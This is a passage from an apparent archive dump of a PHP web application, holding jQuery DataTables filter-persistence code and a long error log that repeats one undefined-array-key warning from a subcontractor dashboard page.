table = $('#super_advanced_table').DataTable({ // Configure initial settings if needed }); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val(), completed: $('#filter_completed').val() }; localStorage.setItem('advancedTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('advancedTableFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); $('#filter_completed').val(filters.completed).trigger('change'); } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); $('#filter_completed').val('').trigger('change'); localStorage.removeItem('advancedTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search(this.value).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); saveFilters(); }); $('#filter_completed').on('change', function () { var status = $(this).val(); if (status === "Completed.") { table.column(5).search('Completed.').draw(); } else if (status === "Not") { table.column(5).search('Not').draw(); } else { table.column(5).search('').draw(); } saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/error_log000064400001007371151676701240011373 0ustar00[15-Sep-2024 07:45:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:12:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:13:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:14:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:31:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:33:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 12:35:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 12:44:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 12:59:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 13:13:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 13:13:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 13:13:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 03:21:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:20:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:30:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:37:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:38:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 05:59:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Sep-2024 05:43:42 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Sep-2024 05:44:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Sep-2024 05:46:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 00:24:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 01:28:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 01:38:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 01:59:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 03:18:49 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:23:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:24:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:24:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:25:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:25:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:25:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:31:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:58:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Sep-2024 04:23:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Sep-2024 04:42:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Sep-2024 04:42:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:36:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:36:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:48:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:48:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:50:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:50:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:50:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:51:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 05:20:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 05:21:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 10:26:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 11:18:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 23:55:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 01:23:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 01:36:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 01:47:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:23:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:28:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:33:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:34:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:44:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:45:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 03:02:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 03:10:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 04:04:01 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 05:49:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 06:05:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 06:11:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 06:52:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 07:11:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 07:15:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 08:01:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 08:22:53 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 08:57:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 09:56:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 09:57:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 10:52:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 01:30:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 01:48:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 02:36:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 03:34:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 04:32:06 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 05:51:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 06:12:06 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 06:18:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 07:52:40 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 09:13:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 10:54:42 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 22:58:05 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 00:45:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 01:06:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 01:16:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 02:01:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 02:52:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 02:54:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:08:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:08:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:14:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:29:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 04:20:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 04:29:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 04:30:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 05:07:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 05:10:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 06:19:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 06:33:22 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 07:00:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 07:33:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 07:59:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 23:25:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 23:30:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 00:59:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 01:01:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 01:17:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 03:01:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 03:50:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 04:14:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 04:25:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 05:04:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 05:06:13 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 06:19:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:43:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:48:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:55:13 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:55:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 23:49:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 05:16:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 22:22:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 23:35:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 23:42:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 01:58:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 03:12:53 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 04:27:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 05:35:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 05:40:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 06:02:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 07:15:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 08:00:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 11:19:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 23:26:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 01:42:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 02:39:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 02:42:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 03:32:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 03:47:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 04:17:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 04:41:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 05:32:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 06:11:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 07:22:14 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 08:38:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 11:31:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 23:23:23 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 00:02:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:07:05 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:07:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:08:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:10:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:13:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:57:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:00:22 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:01:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:01:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:04:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:10:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:49:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 04:27:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 04:31:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 04:59:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 05:53:12 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 06:38:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 08:39:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 08:41:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 23:29:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 23:30:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 23:30:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:04:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:12:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:13:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:48:14 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:24:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:28:42 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:36:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:48:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:49:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 02:04:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 02:07:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 02:40:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 04:24:01 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 04:32:19 UTC] PHP Warning: Undefined array key "pending" in 